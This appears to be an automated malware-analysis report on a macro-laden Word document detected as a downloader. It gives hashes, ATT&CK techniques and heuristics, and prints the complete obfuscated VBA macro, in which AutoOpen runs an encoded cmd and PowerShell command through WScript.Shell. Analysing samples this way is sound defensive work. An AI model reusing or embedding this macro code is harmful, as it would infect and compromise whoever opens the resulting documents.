Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0a57b84fd2016eda…

MALICIOUS

Office (OLE)

Size: 88.1 KB
Created: 2018-08-23 21:31:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: d81e73edf3fb3d2e9a3b3d131b0c4395
SHA-1: e8043316754562fa3af978e0abe961a3823d7082
SHA-256: 0a57b84fd2016eda8bc0b0c63fbd92ff88e80afed140faa97d4a41368b9b78e2
Risk score: 310

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macros are designed to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Valyria-6665593-0' further supports its role as a downloader. The script attempts to construct and execute a command, likely for downloading and executing a second-stage payload.

Heuristics (10)

  • ClamAV: Doc.Downloader.Valyria-6665593-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6665593-0
  • VBA macros detected [medium] (OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
       Error 15607 / NzwMs * SquHw * ZEwnp
    VQwVTCHJuX = CreateObject("WScript.Shell") _
    . _
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
       Error 15607 / NzwMs * SquHw * ZEwnp
    VQwVTCHJuX = CreateObject("WScript.Shell") _
    . _
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "WMWslEJoNi"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [medium] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10727 bytes
SHA-256: 37ddb8e0337f82b59f831e77eb675d64a8a68dc580b21ce6f435552774061134
Detection
ClamAV: No threats found
Obfuscation or payload: likely
129 of 214 identifiers look randomly generated (e.g. 'YXKjrzjwwzDo'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "YXKjrzjwwzDo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NUADRhErKABjQ"
Function GtNUFzjo()
On Error Resume Next
Error 44305 / WSisZw / 24257 * OOcQc
   Error 29367 * 87567 * 57784 * zndLi
   Error 23906 * CwUQS / jPiIn / rqmGZ
XipnKZwbhus = "mD /" + "V:^" + "o ^ ^ " + "  " + "/R" + Chr(0 + 1 + 3 + 4 + 26) + "  ^" + "s^e^T  " + "^  ^ ^" + "Qud^b"
Error 1678 * 68716 * 2201 * sXQpG
rPnmcsFS = "=AACAg" + "^AA^I" + "A^ACA" + "g^A^" + "A^I" + "^AACA" + "g^" + "A^AI"
Error arCTkj * KsBwP / 50697 * jfulQA
   Error 37159 * BWmCZ * zjUbrT * aAPjWk
   Error 41992 / WXUiOG * 56112 * mIfFE
tuSnLuhiL = "^" + "A" + "AC" + "A" + "^g^A" + "A^I^AAC" + "AgA^" + "A^I" + "A^" + "ACAgAQ" + "^fA0^"
Error 89852 / 22074 * 86446 * wpiol
   Error 17792 / FfiFkE
WDmzVv = "HA" + "7B^" + "Aa^AMG" + "A^0BQ" + "^Y^A^M" + "GA9^B^" + "w^OAs^" + "GAhBQZ" + "^AI^H^A" + "i" + "Bw^O^A"
Error dSqCzC / lTorNr
   Error 82025 * ikTbEQ / 50627 * nUEwo
XjFRBEpPpF = "^I^E^A^" + "w" + "^BgcA^" + "QCAg" + "^AQ" + "bA" + "^U^GA0"
Error wTcFMl * 59161
   Error amjXB / soNGVE
   Error 72859 / MsjPd
   Error 73361 * GRtCD
   Error EDRiRZ / jsfGU
RfdoW = "B^Q^S" + "^A0C^A" + "lBw^a" + "A8^GA^2" + "B" + "^g^b^" + "A^kE" + "A7^A^QK" + "AI^E^" + "A^wB^" + "gcA^Q" + "CAgAA^L" + "A^4^"
Error 3800 * cbnZk
   Error 84170 * 83001 / 29065 * EBSoVo
   Error 12690 / FMNcEu * 14396 / hOOWNz
lntDRiqukW = "E" + "A" + "^Z" + "^Bwc^" + "A^" + "QCA^oA^" + "QZ^A^wG" + "^ApB^g" + "R^A^Q^" + "GAh^B" + "^wb^A^w" + "G^" + "Au^"
Error 4905 / wFmQs / uAmbAi / KBOJc
VOMWJprTVjA = "Bwd" + "A8" + "^G" + "^AE" + "B^g^L^A" + "^gGAk" + "BQ" + "W^A^" + "QC^A"
Error 83205 * XmzMz
   Error 47354 / wQaiz
HUhZMqEmsM = "^" + "7BQeAI^" + "HA0" + "^B" + "^w" + "e" + "A^kC^A" + "^" + "k" + "^B" + "w" + "^U^Ao"
Error 33146 / 42662
   Error 53989 * NTBsK
zUEjZFJ = "^HAkA^" + "A^I^A4" + "^GApBA" + "^" + "I^A" + "^4^" + "E^"
Error alwqi * hARfBa / 54479 / cjEmM
   Error 40260 * 85797
SMKTTPH = "A" + "ZBwcA^Q" + "C" + "Ao^A^A" + "aAMG^" + "AhBQZA" + "IHA" + "vB^" + "gZ^As^" + "D^A" + "n^AQZ" + "Ag^HAl^" + "B^g^L^"
Error 69608 * nDkGBf
   Error uNTjv * UszqP
wjaDwLbojVz = "AcCAr^A" + "^Q^b" + "^AEF^A^" + "D^" + "B^A" + "J" + "^AsCAn" + "^A^A^XA" + "cC^Ar^A" + "wYAkG" + "As^B" + "g^Y^A"
GtNUFzjo = XipnKZwbhus + rPnmcsFS + tuSnLuhiL + WDmzVv + XjFRBEpPpF + RfdoW + lntDRiqukW + VOMWJprTVjA + HUhZMqEmsM + zUEjZFJ + SMKTTPH + wjaDwLbojVz
   Error 58261 * sPVPQ
   Error MjGdr * qcoMtI * 41035 / bBUjuH
   Error 94134 * RoYElq / 65408 / NGEIdQ
   Error 82860 * ictQU * 67541 / qNSSdb
End Function
Function ZUswQz()
On Error Resume Next
Error qzPnz / 8571
   Error sWJRQ * sAuwsJ
qCONCWlWlT = "^U" + "^HAwB" + "g^OA" + "^Y^" + "HAu" + "BQ" + "ZA^QC" + "A^" + "9A^g^QA" + "^A^H" + "^A^y"
Error 55151 / ivLzMd
   Error CfjuEO * jlKwj * mNVIs / OvzpaU
   Error YPlRww / pIXVOG
   Error 92044 / 82176 * 56834 * fTOkKQ
QuBmNdUM = "^B^AJ^A" + "sD" + "An^A^" + "AOA" + "^QD^A^"
Error tcRph / EpGZpN / 70332 / zzzZUM
   Error unLzK / auwBGl * tjlut / 31541
   Error GlqIB * EjawI
mpbUwK = "3^A^w^" + "J" + "A^AC^A" + "9A^" + "A^" + "IA" + "^0GAR" + "Bw" + "QA^QC^" + "A7A^" + "Q^K^Ac" + "CA^" + "A^Bw^"
Error tIcHV * sbRYV
GsXojJECNk = "J^A" + "^" + "gC^" + "A^0B" + "^Q" + "a^A" + "^w" + "^GA^wB"
Error vUwjnV * fwYno * ZwrFUn / 74187
vcDPKMGqiv = "wUA4C^A" + "n^A" + "^" + "g" + "Z^A^kE" + "AVBw^L" + "A^Q^" + "H" + "^" + "A"
Error 76517 / hRkGCb
   Error 93401 / qNffU
   Error qOJDUh * SdZSA
MvQXbAXA = "l^B^g" + "b^A4C" + "A^zBgbA" + "8" + "^G^Ap^B" + "AdAUH^" + "As" + "B^w" + "^b^AM^H" + "A^0^B^Q" + "^a^"
Error EXjpaq * KjlqGT / sodsIw * hssJtM
MDDZRwKl = "A^oH" + "A^lBgL^" + "AMG^" + "Au^" + "B^Qa" + "AQHAu" + "BQ^" + "Z"
Error AclkpI / 16919 * qXfqjj * oPhzJU
   Error 8284 / OhtkQ
   Error 98716 * jlkjiS / 73767 * oAEdS
   Error 17143 / VrpTw
zRizGXwbzmk = "^A0" + "G" + "^A0" + "^B" + "w"
Error 35976 / DESFcw / tXFXTm / ozFtkU
   Error XluJDc * VKLov * 40245 / HRTbO
mpJfjm = "cA^U^GA" + "^2Bgb" + "AkG^A" + "z^" + "B^Q^" + "Z^A8"
ZUswQz = qCONCWlWlT + QuBmNdUM + mpbUwK + GsXojJECNk + vcDPKMGqiv + MvQXbAXA + MDDZRwKl + zRizGXwbzmk + mpJfjm
   Error 90362 / Miiqq
   Error 95836 / FtabQ
   Error IiQoiY / iYdUV
End Function
Function FjDHIjYf()
On Error Resume Next
Error fTGKAi * LdiKL
TwzobtAD = "CA" + "v" + "^A^g^O" + "A^A^" + "H" + "A^0^B" + "^Ad^Ag" + "^G" + "^A" + "^A^B" + "^w^" + "T^A^8C" + "^A^"
Error DLBwvT / wNCPj / 61212 * QkXmFY
   Error 99907 / 96109 * Hucls / 92551
btGRfIBFT = "t^" + "Bw^" + "bAM" + "GA^u" + "A^QYA" + "wG^A^s" + "B^" + "Q" + "^" + "a^AIHA^" + "yB^w^" + "b"
Error 42122 / 24374
   Error YfKOak / mXraz
   Error 29173 * NtAkOd
kfrwqYvNmjj = "^Ao" + "HA^" + "l^B^gb" + "A^" + "kG" + "^A" + "s^B^QZA"
Error EqnAB / oRjFzs
   Error 41351 / HjdEB
   Error OGqqWI * cTlEzN * 1902 / ssFBt
   Error jAEopt * wKlzsk
   Error 7264 / GEoCE
   Error 3058 * 41790 / 6276 * LsBMEV
BhljjlfwbN = "^UHA^x^" + "Bw^" + "Y^AE^G" + "^A" + "^qBg^L" + "A8G" + "ApB" + "^AZ^A" + "^E^G^A" + "y^B"
Error 62076 * BJsvv
XjujMCCPJjv = "^Q" + "Y^A^Y" + "H" + "A^" + "p^BA^dA"
Error 26998 / tfhwh / 65242 / 71937
MwsKcEsHTTk = "M" + "GA^1^" + "B^A^" + "ZA" + "8GAy^BA" + "cAI^"
Error 85635 * kdpBh * XviInt / CVzLs
nDiwaf = "H^" + "AlBg" + "^a" + "^A" + "^U" + "HAtB" + "w^L^A8" + "C^A" + "6^A^Ac^" + "A"
Error 38209 / OSkCjF / lOuMk * LkwJw
   Error 3353 / HKEivT * 58741 * QZPVR
   Error 59822 / DhEQLr
CWbJXszqZE = "Q" + "^HA" + "^0B^" + "A^aA^A" + "EA^a^Bw" + "^M^A" + "I" + "^D^A^" + "j"
Error lJsUai * fzWSmZ / 23143 / QvpbSC
   Error GutEo * LUBot / ljlXO / GQJPGE
   Error lzdVin * zEBET
   Error hnMMz * rooXrh
jCZKAPPbwhY = "B^" + "A" + "MA^A" + "^D^Aa" + "^B^gRA" + "8C^" + "A^yB" + "g^Z^A^" + "4CAl" + "^B" + "Ad" + "AQH^A"
Error hikoO / Muzuzc / tSWAY / LIzZG
   Error 64082 * RnnFi
   Error OPYFjO / bSuds / 37153 * dOuHv
FzjzX = "lBgbAE^" + "G^" + "A0B" + "AZA^U^" + "HA^hBgY" + "A4C^" + "A" + "2^BA" + "^d^A^Q^" + "H^A^l" + "B^"
Error 93392 * vhVUz
   Error 99748 * lRdjaM * 72083 / sEEpR
nBuUPVdKan = "gaA^8^" + "G^A" + "yB" + "AcA" + "8C^Av" + "A^g^" + "O^AA^HA" + "^0B^A" + "^d^A" + "gG^A^A^"
FjDHIjYf = TwzobtAD + btGRfIBFT + kfrwqYvNmjj + BhljjlfwbN + XjujMCCPJjv + MwsKcEsHTTk + nDiwaf + CWbJXszqZE + jCZKAPPbwhY + FzjzX + nBuUPVdKan
   Error UivVIF / KOhpO * KQucf / MwnrN
   Error 28418 / NJjRTC * ICdvTh / oANKki
   Error 64491 / SGjFi
   Error 28392 / BVzuuG * ONdSrd / ShEITC
   Error 45924 / jrTmk
End Function
Function pTbXPiINQFp()
On Error Resume Next
Error 53686 * DYdkL * 63002 * wYmhcc
   Error 65383 * knSSuv / 10407 * oVOZf
sqqETkruPX = "B" + "^Q^Y^A" + "^8C" + "^AyBg" + "^Z^A^4" + "C^A" + "^l^B^A" + "^b^Ak"
Error 60981 * fjOvON / GpZGH / 39069
   Error IzjDz / tINdq * MzlZbV / iFLML
   Error nGJGo * TSYzC / 16421 / tCTjN
   Error EvJaw / HdsLw
uwmHk = "^H^A^" + "0B" + "^" + "wcA^g^" + "H^A" + "^" + "l"
Error swIEF / odSlFN
   Error LtvzV * zzuGQ / 4027 / jHXGW
   Error 95365 * UZTqOZ * 99114 / 63946
   Error TdwIXM / ruoZTf
   Error 20372 * bMiWzz / 43927 * qUSVj
icTUOUqjwz = "^" + "B" + "^" + "g^L^AU^" + "G" + "^" + "A^" + "pBgb^" + "Ak^GAnB" + "^gc^A^" + "kG^" + "A2^Bw"
Error TtwfL * znTVqR
   Error 49172 / YqUkhX
   Error zpRwbl / irdIp
   Error 74184 / EubSb
dmTVUKwZ = "^" + "L^A^8CA" + "6^A" + "^AcA" + "^Q^HA" + "^0^BA" + "a^A^A^" + "EAw^Bgc" + "^AIH"
Error 38007 * 16131 / 14485 / VYEpZl
   Error 81302 * RnjTrw
   Error IklCWL * EBHmKP
   Error 11716 / prrRPn
wITRTiRdKAN = "^AvAQY^" + "A" + "^o" + "H^" + "Au^" + "AwbA^M^" + "G^"
pTbXPiINQFp = sqqETkruPX + uwmHk + icTUOUqjwz + dmTVUKwZ + wITRTiRdKAN
   Error 41668 / NnzMs
End Function
Function XkEPBK()
On Error Resume Next
Error 61538 / qTuCjH
   Error iOWfV / Kzaiv / 76979 * uBmvI
   Error 96864 / VizfFk / uCwmpN / FCnKGD
   Error dJUYSf / NOjsj * 23619 / jNIiJb
XRLTlP = "Au^" + "A^" + "AaAM^H^" + "AvB^AdA" + "^o" + "^G" + "Ak^B" + "^w^" + "LA8CA6"
Error 64652 * Jhjba
   Error kYipM / iBrnk * 26338 / WzPYdF
   Error 29127 / XvTYT
   Error 89904 / cNVjn
   Error IwpTvj * zduQP
   Error 41461 * mbDOs
ScTVFB = "AAc^AQ" + "HA^0" + "BA^a^Ac" + "CA9A^AZ" + "A" + "M^FA" + "^6BAJA^" + "s^DA" + "^0B^gb" + "AU^GA^"
Error 34750 * ssdKh * 8861 / OvMGaD
   Error wVGil / hiZDls * 87099 * JIPDYv
hvNdPXv = "p^B^A" + "b^A" + "M^E^A^" + "iBQZ" + "A" + "cFA^u" + "^" + "A^A^" + "d"
Error 29963 * cwNijP * iHASXN * jTLOE
wOvbIqlCGzw = "A" + "^UG^AOB" + "^A^I^A" + "^QHAjB" + "^" + "Q^Z^AoG" + "^A" + "^iB^w" + "^bA^0C" + "A^3^" + "BQ^Z"
Error qhmEq * 43579
   Error 27520 / uzWFkn / IjQGjr / YTDiza
   Error 47081 * sFiFo / 49374 * zKNDl
mumDOwOd = "A^4G^A" + "9^A" + "Aa^A^QG" + "^A^Z^B" + "^AJ ^e"
Error suIQu / rbzTAJ * zZoNsw * phtLVl
   Error 21484 / XFOppI / rThTd * 89275
   Error VlULAw / IArYEf / zAWOMq * hIzYjU
   Error 371 * soTLq
vuuBnXzzmr = "^" + "-^ l^le" + "^hsre^w" + "^op" + "&   " + "f" + "^Or  /" + "^l %" + "^u ^" + "IN" + "  (   ^" + " ^1^0" + "^53  "
Error WHGGw / WSKfb
   Error dUmTct * aVQwY
   Error 46305 / DDhOpT / jUzKh / cHaJM
   Error zQDhK * jzPhw
KfUwR = "^,^ ^ " + "^-" + "1" + ", ^ ^" + " 0) " + "d^O" + "   ^sE^" + "t" + " ^Y4^Z" + "=!^Y4^" + "Z" + "!!^Qud^" + "b:~%^u"
XkEPBK = XRLTlP + ScTVFB + hvNdPXv + wOvbIqlCGzw + mumDOwOd + vuuBnXzzmr + KfUwR
   Error 3667 * rCitnc
   Error USLjw * 26908 * pMWbcW / ifwfi
   Error phkVi / ZaGriQ / 28515 * kWMpO
   Error JczCu / AiFTS
End Function
Function TjzpqVl()
On Error Resume Next
Error FVZXwV / IojBB / 58963 / bLQSRO
STulNvrBS = ", " + " 1!&&^i" + "^f" + " " + "%^u" + "   " + "^" + "l^eQ " + " ^0  C^"
Error 94243 * IqtJj / 80491 / aAscO
   Error 21100 * DYwCuO
JjoXm = "a^lL %" + "^" + "Y4" + "^Z:^~" + " " + " -" + "^1" + "0^" + "5^4%   "
Error 1401 / BZwsAr
   Error 47335 * PIbtZ
   Error bBlHN * FVNqH
   Error 4461 * vwtOhQ * izBCp / vncfZE
PLihKwEEj = " " + Chr(0 + 1 + 3 + 4 + 26) + ""
TjzpqVl = STulNvrBS + JjoXm + PLihKwEEj
   Error 22628 * thlUa * 59358 * kzWQT
   Error irirtB / FXiJhl
End Function


Attribute VB_Name = "WMWslEJoNi"
Sub AutoOpen()
On Error Resume Next
   Error 15607 / NzwMs * SquHw * ZEwnp
VQwVTCHJuX = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(3 + 9 + 1 + 9 + 45) + LiuKUmwvT + HpcpwtRWXjU + GtNUFzjo + ZUswQz + FjDHIjYf + pTbXPiINQFp + XkEPBK + TjzpqVl + iVbmUjlzbqM + lrFEXWf, 170652707 - 170652707)
   Error 82924 / zPCuX
   Error 76717 / qBPbwL
End Sub